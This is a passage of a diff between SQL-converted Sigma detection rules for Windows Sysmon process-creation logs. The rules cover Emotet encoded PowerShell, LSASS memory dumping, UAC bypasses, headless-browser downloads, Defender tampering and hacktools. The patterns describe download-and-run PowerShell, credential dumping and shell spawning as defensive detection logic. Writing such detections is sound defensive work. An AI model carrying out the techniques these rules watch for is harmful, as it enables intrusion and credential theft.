download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE 
'%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": 
"fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", - "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.defense_evasion" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Legitimate usage of the features listed in the rule." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + 
"attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 
'%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine 
LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + 
"filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects 
suspicious PowerShell invocation command parameters", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND 
NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Registry Modification Via Regini.EXE", + "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate modification of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE 
'%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_regini_execution.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE 
